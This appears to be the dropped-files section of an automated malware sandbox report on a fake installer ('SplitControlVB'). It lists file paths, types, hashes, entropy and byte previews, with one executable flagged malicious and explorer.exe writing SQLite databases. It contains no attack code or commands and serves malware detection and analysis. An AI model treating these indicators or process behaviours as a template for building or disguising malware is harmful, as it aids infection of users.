                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:IFF data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1716
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.781797138644031
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                                                                                                                                                                                                                                                                MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                                                                                                                                                                                                                                                                SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                                                                                                                                                                                                                                                                SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                                                                                                                                                                                                                                                                SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1825
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.088030483893024
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                                                                                                                                                                                                                                                                MD5:992C00BEAB194CE392117BB419F53051
                                                                                                                                                                                                                                                                                                                                SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                                                                                                                                                                                                                                                                SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                                                                                                                                                                                                                                                                SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1825
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.088030483893024
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                                                                                                                                                                                                                                                                MD5:992C00BEAB194CE392117BB419F53051
                                                                                                                                                                                                                                                                                                                                SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                                                                                                                                                                                                                                                                SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                                                                                                                                                                                                                                                                SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:InnoSetup Log SplitControlVB, version 0x30, 8165 bytes, 813848\user, "C:\Program Files (x86)\SplitControlVB"
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8165
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.076264417876058
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:NbEN8WVPp2DbK+T4hlOIhDJ4cVSQs0Ln+KCVKlrEw:u8WVPp2N+QIhqcVSQ1nmUr
                                                                                                                                                                                                                                                                                                                                MD5:95E465B70F5420D54909CA8829BEF6CC
                                                                                                                                                                                                                                                                                                                                SHA1:07037F9404A8B452F9A42AF2350A4C7EF3047576
                                                                                                                                                                                                                                                                                                                                SHA-256:A7C3400D2A2B658AC2CBA6213B7F969D2D5F15DA7F872434F3D06824DCB3B325
                                                                                                                                                                                                                                                                                                                                SHA-512:867B8540C3E09A7C521D72CE13FDB6D8A56A60D732A11F0FEB77AE44A422203D5E4036087AEC54DFA376CFCA99AAC3CB5EEDA34BAB0C9FC99AB2CC4816269786
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:Inno Setup Uninstall Log (b)....................................SplitControlVB..................................................................................................................SplitControlVB..................................................................................................................0...B.......%..................................................................................................................0........._.g......E....813848.user%C:\Program Files (x86)\SplitControlVB.............8.... ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSys
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):714526
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.506152502896379
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:sRObekMSkfohrPUs37uzHnA6zg5cI5MpAHERDjrNyTeR0oUGOHtraxDExycq:uObekrkfohrP337uzHnA6cH+iHEOWUG/
                                                                                                                                                                                                                                                                                                                                MD5:5ACDCBFDD1C7B9E1BE0F41EE193D5C56
                                                                                                                                                                                                                                                                                                                                SHA1:4F66C819B01966DD96A6A3532EF2872E7E618985
                                                                                                                                                                                                                                                                                                                                SHA-256:FC03576967335B7B91C684A4969170877F6BE6D7DABE0FBE3D83553C509FA2DD
                                                                                                                                                                                                                                                                                                                                SHA-512:FD5A07C7EB107206DFDB39389F1399ACE69B5BAA0513279C9832CE2AFAC919E9941A55EC4154A45AC5C3119BC10B5647C570341960C9C66E26F97CA69BB6725D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d...........p............@..............................................@...............................%..................................................................................................................CODE....(c.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1974784
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9356162031894995
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:Qe6RRRpEHQN/ThQrezxMQnXW8qaJZkRLagEoH6gFt:Q9nLEcrhhmYLwpbE+t
                                                                                                                                                                                                                                                                                                                                MD5:59646583129ACF5244D686F15AADB25A
                                                                                                                                                                                                                                                                                                                                SHA1:5B8B55DC12217EB37BD25CA61CD7ACEEC729E603
                                                                                                                                                                                                                                                                                                                                SHA-256:2CDC39F39A9369AE4062822EA6726F2E508D5D29514B3CEE06F809CE6EF16250
                                                                                                                                                                                                                                                                                                                                SHA-512:99A4C6612DE866F966F2B9F84C16ADA59D3606DB942011D720DEBE12F4B059A9AEC1B7C1046231B15AE728B6A27E616056588680AA3EBCBF0340A4D6EEDDB9B2
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....Yc.................T....D......>.......p....@..........................@`......l..........................................<.....^.X|...........................q..................................@............p...............................text...rS.......T.................. ..`.rdata...3...p...4...X..............@..@.data...|.B.........................@....rsrc...X|....^..~..................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5393296
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.9418667917616546
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:98304:TDnliAmKBdLG5LY5J3sMQiOSu3J8Ce4EF1LsWaiG+LZlMuSmQjx2yNCjO4Wx:TDnrmsJgWJZT5MBCi4u
                                                                                                                                                                                                                                                                                                                                MD5:ADAF229BB6CEC48AC6D680EBF4856015
                                                                                                                                                                                                                                                                                                                                SHA1:57CAECDA4180E60CCD098F61D2D9E8EE7B9A223F
                                                                                                                                                                                                                                                                                                                                SHA-256:28085B8D4212ADEAB65CB6B7102D2680779E344FDD0F07207E51C82B2746858D
                                                                                                                                                                                                                                                                                                                                SHA-512:B69608F3C2EA3A39A0E760E2A1E0BA34F4648481DEC15142D82DBE076820E25759A0E541FD9008ED84C949E15B40247350987571679B472E09F84983C82FF4EE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..W...W...W...8...V.......C...8...m...W.......5...\...a,..V.......V...RichW...........................PE..L....2.e.................p...........5............@..........................pR.....].R.....................................0...x....................................................................................................................text....b.......p.................. ..`.rdata..0........ ..................@..@.data....O.......0..................@....rsrc...............................@..@.cmail...p>......k>.................`...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:Pln:d
                                                                                                                                                                                                                                                                                                                                MD5:6BEE10C18C9358DC1A35EFF2E11587D8
                                                                                                                                                                                                                                                                                                                                SHA1:3651C8318BD85D4B6F0AFD13299C4B7024DFBF06
                                                                                                                                                                                                                                                                                                                                SHA-256:817582FCA69E4A353868466D3A02114F3F7B945FAD73B96BE37523D1C0E18B70
                                                                                                                                                                                                                                                                                                                                SHA-512:ADF589BE9DEA29452C9B5D4AB9A9137526261E7A577C651560994A230F4B5077CBB9EE009482EB369E9D6CC78AA318D8509C4B910676A862FFFBFCFAF6560AF1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:....
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):128
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.9069818137270764
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:1k/GTQycTEvIgAnDTa3pkHil/:1rQy0EvIxPa3pkHit
                                                                                                                                                                                                                                                                                                                                MD5:357ACA400DC2E1FC61FC5B8C66BA4975
                                                                                                                                                                                                                                                                                                                                SHA1:35BD8E97F1FF7F55C3D1082C70AB99BDBBCDFD44
                                                                                                                                                                                                                                                                                                                                SHA-256:F5832873187B52BE987AF2BDDB7E2FEA81E0605C6A9843020C375D1710CED212
                                                                                                                                                                                                                                                                                                                                SHA-512:2CE616BC68801013EA59C59FD232822D59B68C30AB8701F802D0D686DF92CDB19B329A6FD2B3EAE2E91862F048D2BD7A35A2430C70F466F609A350745E88549C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:3e0f2500c0db57d92fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:QV/l:Qn
                                                                                                                                                                                                                                                                                                                                MD5:24E5618CB4B76289121FFFEFFF44E56A
                                                                                                                                                                                                                                                                                                                                SHA1:1BB98264A9993EC1BF592EDECDBE869B3C8EF967
                                                                                                                                                                                                                                                                                                                                SHA-256:E6B98517E7CE557E5331DBDCDEB8B7C56BE161F9A84304E5C458B0561AE58FFE
                                                                                                                                                                                                                                                                                                                                SHA-512:CCCBDEFC09571D54575821081094E68C0A7DFC0FB5ABCB80B08915CC7CC2E89FED111983A4C262B15259D38A6B540FA3427312C63572A8F9E9AD43535D713789
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:6..e....
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\B013.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3094
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.33145931749415
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aym1Tqdqlq7qqjqcEZX:Pq5qHwCYqh3qtI6eqzxP0at1Tqdqlq7k
                                                                                                                                                                                                                                                                                                                                MD5:EC1584FF5E26CBD1A76278EE1CD29D58
                                                                                                                                                                                                                                                                                                                                SHA1:F2FE0818F9BB4A7BAA9F4B6A7D25456BC1E84D34
                                                                                                                                                                                                                                                                                                                                SHA-256:7EDB1CA78960087FB08214765D92F1DFC7F433C69A04A6A8F6425B3BFCD47B0B
                                                                                                                                                                                                                                                                                                                                SHA-512:CBA5ED011BB75CDCBE22D3B5CFCF4957C52C687368FD8AE7E422A970A1AB08F83B320C1531E353AAA75D1D8695602457E468C3ECE35E8E1FAA0899115554CF49
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1019
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.236946495216897
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
                                                                                                                                                                                                                                                                                                                                MD5:5D20D9B3F928AC964E07C561FD8A3F42
                                                                                                                                                                                                                                                                                                                                SHA1:B702BE149FCF94831A975F2CD06B2DFE020D9632
                                                                                                                                                                                                                                                                                                                                SHA-256:59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
                                                                                                                                                                                                                                                                                                                                SHA-512:30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16296
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.052124604275745
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:cMY4QkV6icO1hMtqyd4AW9V9hC1hIhyd24ZFtVf1hc1xc2q48XVd91hMBf/40VV5:6BkoicOaqyrqvUg62M1ux8nX98HJiO9b
                                                                                                                                                                                                                                                                                                                                MD5:CEABBEDFBCCF9E5F4CE2ABD3574C913F
                                                                                                                                                                                                                                                                                                                                SHA1:B8F01C314D9A0A5E7FFF4A9C97B70B10999BA298
                                                                                                                                                                                                                                                                                                                                SHA-256:0200A2C44BE41F5366AF708CF3DA47F82C6E3AD5B525A8BB00B14C65C213B0C1
                                                                                                                                                                                                                                                                                                                                SHA-512:F00E78FA65E57366AA1492972DB6E972C16BF658E8AAE2497A586C822400EF40B6C3D9B866C64FFFB9A3978A5A156FD8DE0B1EBC3B1C3F16F7D8AF521C8355A0
                                                                                                                                                                                                                                                                                                                                Malicious:false
